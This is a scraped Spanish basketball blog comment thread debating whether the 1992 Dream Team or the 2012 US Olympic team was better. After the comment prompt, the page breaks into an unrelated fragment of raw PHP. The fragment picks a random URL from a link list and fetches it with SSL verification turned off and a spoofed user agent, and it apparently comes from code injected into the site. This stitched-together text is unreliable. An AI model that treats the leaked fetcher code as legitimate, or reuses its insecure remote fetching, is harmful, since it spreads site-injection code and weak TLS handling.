    Denise: No puedo opinar porque a los del 92? no los ví en directo, y aunque podría ver sus videos, no me parece lo mas apropiado opinar con unos highlights o “las mejores jugadas/canastas de …”; lo unico que digo, es que, no sé si este será el caso, pero muchas veces en el deporte y sobre todo en la música, tendemos a mitificar y endiosar lo acontecido en las décadas de los 70? y los 80?; y tratar a lo de esta época como algo inferior o directamente una basura.Supongo que esa tendencia se mantendrá y lo actual no se valorará hasta 2030.

    Yo sí los he visto. Entiendo y comparto tu comentario. Creo que me decantaría por el del 92, pero quizás por otros matices no valorados. Y tener en cuenta una cosa, los rivales. Salvo los croatas, el resto estaba todavía viéndolas venir. Y hablamos de los croatas en plena guerra. Pillamos a la exYugoeslavia al completo y las hubieran pasado canutas. (De hecho lo hicieron en la primera parte).

    HIs,acepto el reto de la música cuando quieras. Tendemos a mitificar y a no valorar lo que tenemos cercano. Lo de la música es una conversación que llevo tiempo teniendo con mis colegas. Fuera gustos, los 90 inicio siglo XXI, hay monstruos como REM, U2, Madonna… Y de ahora no te sabría decir mucho, pero lo de Amy Winhouse era brutal.

    Con lo que resumiendo. Muy de acuerdo con el comentario de Denise, y me quedo con la del 92, a sabiendas de que si apostara podría perder perfectamente.

      Citar

  32. GreenPride dice:
    #32

    Bueno este desde mi punto de vista es un debate estéril. el Dream Team es único y este equipo 2012 simplemente no se les puede comparar. Si la plantilla 2012 no hubiera tenido ninguna baja estaría más igualado (con Wade, Howard, Bosh o Bynum en el equipo 2012 ganaría mucho). En general ¿Cuantos jugadores de 2012 meterías en el equipo del 92 (sacando a uno del 92 claro) Pues quizás meter a LeBron y Durant por Mullin y Bird (sólo porque Bird ya se iba a retirar que si no tampoco) y posiblemente a Kobe por Drexler. Más allá de estos tres creo que ninguno de los demás le quitaría el puesto a ninguno de los de 2012 habiendo una diferencia sideral en 3 de los puestos (bases, ala-pivot y pivots) y teniendo en cuenta que en los escoltas en el del 92 jugaba el mejor jugador de la historia (ese tal MJ) y sin contar con que la visión de juego de gente como Pippen, Magic, Bird o Stockton no es compartida por ningún jugador actual.
    Vamos que sinceramente es un entretenimiento compararlos, pero no hay comparación posible.

      Citar

  33. HisRoyalAirness dice:
    #33

    GreenPride:
    Bueno este desde mi punto de vista es un debate estéril. el Dream Team es único y este equipo 2012 simplemente no se les puede comparar. Si la plantilla 2012 no hubiera tenido ninguna baja estaría más igualado (con Wade, Howard, Bosh o Bynum en el equipo 2012 ganaría mucho). En general ¿Cuantos jugadores de 2012 meterías en el equipo del 92 (sacando a uno del 92 claro) Pues quizás meter a LeBron y Durant por Mulliny Bird (sólo porque Bird ya se iba a retirar que si no tampoco) y posiblemente a Kobe por Drexler. Más allá de estos tres creo que ninguno de los demás le quitaría el puesto a ninguno de los de 2012 habiendo una diferencia sideral en 3 de los puestos (bases, ala-pivot y pivots) y teniendo en cuenta que en los escoltas en el del 92 jugaba el mejor jugador de la historia (ese tal MJ) y sin contar con que la visión de juego de gente como Pippen, Magic, Bird o Stockton no es compartida por ningún jugador actual.
    Vamos que sinceramente es un entretenimiento compararlos, pero no hay comparación posible.

    Amén hermano

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>